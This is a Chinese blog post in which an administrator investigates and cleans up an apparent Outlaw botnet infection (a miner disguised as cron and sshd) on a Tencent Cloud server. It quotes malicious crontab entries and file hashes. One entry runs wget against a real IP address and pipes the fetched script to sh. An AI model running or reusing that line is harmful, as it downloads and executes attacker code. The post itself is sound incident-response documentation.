Linux【问题记录 01】腾讯云 cron、sshd 进程CPU占用超95％（亡命徒 Outlaw 僵尸网络攻击）问题排查及处理步骤

原创

yuanzhengme

修改于 2025-06-06 14:35:23

1160

从《亡命徒（Outlaw）僵尸网络感染约2万台Linux服务器，腾讯安全提醒企业及时清除》一文得知 kswapd0 是挖矿程序，tsm 是爆破程序【tsm之前见过，占用率不高，还以为是 TencentSystemManager :angry:】这次没有 tsm 进程了，看来已经爆破成功 :cry:

1.开始排查

 只保留有问题的两个进程【曾经kill过 没在意 之前的cpu占用没有这么高】

[root@tcloud ~]# top

top - 13:55:18 up 21 days,  4:43,  1 user,  load average: 4.52, 4.25, 3.76

Tasks: 285 total,   1 running, 284 sleeping,   0 stopped,   0 zombie

%Cpu(s): 96.7 us,  2.6 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.7 si,  0.0 st

KiB Mem :  1882020 total,   110312 free,  1209604 used,   562104 buff/cache

KiB Swap:        0 total,        0 free,        0 used.   218676 avail Mem

  PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND

 3460 elastic+  20   0  307928 269380      4 S 70.8 14.3 611:32.96 cron

 6011 elastic+  20   0   50476  15104      4 S 24.9  0.8   4:55.06 sshd

查看了一下定时任务：

[root@tcloud ~]# crontab -l

no crontab for root

查看了一下 /var/spool/cron/ 文件夹的定时任务：

[root@tcloud ~]# cd /var/spool/cron/

[root@tcloud cron]# ll

total 12

-rw------- 1 elasticsearch elasticsearch 328 Sep 13 23:19 elasticsearch

-rw------- 1 gpadmin       gpadmin        73 Sep  2 01:55 gpadmin

-rw------- 1 hadoop        hadoop        283 Aug 20 11:57 hadoop

[root@tcloud cron]# cat ./elasticsearch

1 1 \*/2 \* \* /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1

@reboot /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1

5 8 \* \* 1 /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1

@reboot /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1

0 \*/23 \* \* \* /tmp/.X26-unix/.rsync/c/aptitude>/dev/null 2>&1



 这个明显就是kdevtmpfsi挖矿病毒的定时任务

[root@tcloud cron]# cat ./gpadmin

\* \* \* \* \* wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1



[root@tcloud cron]# cat ./hadoop

1 1 \*/2 \* \* /tmp/.X25-unix/.rsync/c/a/upd>/dev/null 2>&1

@reboot /tmp/.X25-unix/.rsync/c/a/upd>/dev/null 2>&1

5 8 \* \* 1 /tmp/.X25-unix/.rsync/c/b/sync>/dev/null 2>&1

@reboot /tmp/.X25-unix/.rsync/c/b/sync>/dev/null 2>&1

0 \*/23 \* \* \* /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1

查看了一下阿里云的服务器：

[root@aliyun ~]# cd /var/spool/cron/

[root@aliyun cron]# ll

total 0

2.病毒处理建议

建议企业 Linux 服务器管理员检查服务器资源占用情况，及时修改弱密码，避免被暴力破解。若发现服务器已被入侵安装挖矿木马，可参考以下步骤手动检查、清除：

删除以下文件，杀死对应进程：

/tmp/\*-unix/.rsync/a/kswapd0

\*/.configrc/a/kswapd0 md5: 84945e9ea1950be3e870b798bd7c7559

/tmp/\*-unix/.rsync/c/tsm64 md5: 4adb78770e06f8b257f77f555bf28065

/tmp/\*-unix/.rsync/c/tsm32 md5: 10ea65f54f719bffcc0ae2cde450cb7a

检查 cron.d 中是否存在包含以下内容的定时任务，如有进行删除：

/a/upd

/b/sync

/c/aptitude

3.详细处理过程

# 1.先删除了 /var/spool/cron/ 下的全部文件

# 2.kill掉【cron】和【sshd】两个进程

# 3.查找定时任务

[root@tcloud ~]# find / -name cron.d

/usr/local/elasticsearch/.configrc/cron.d

/etc/cron.d

    # /etc/cron.d 文件夹下文件【未发现病毒定时任务】

    # 查看/usr/local/elasticsearch/.configrc/cron.d后发现是病毒任务 将其删除 

    [root@tcloud ~]# cat /usr/local/elasticsearch/.configrc/cron.d

    1 1 \*/2 \* \* /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1

    @reboot /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1

    5 8 \* \* 1 /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1

    @reboot /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1

    #0 \*/23 \* \* \* /tmp/.X26-unix/.rsync/c/aptitude>/dev/null 2>&1

# 4.查找 kswapd0 相关文件【未找到】

[root@tcloud ~]# find / -name kswapd0

# 5.查找 tsm64 相关文件【未找到】

[root@tcloud ~]# find / -name tsm64

# 6.查找 tsm32 相关文件【未找到】

[root@tcloud ~]# find / -name tsm32

4.总结

感觉上处理的并不彻底，先观察一下 :joy:

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

云服务器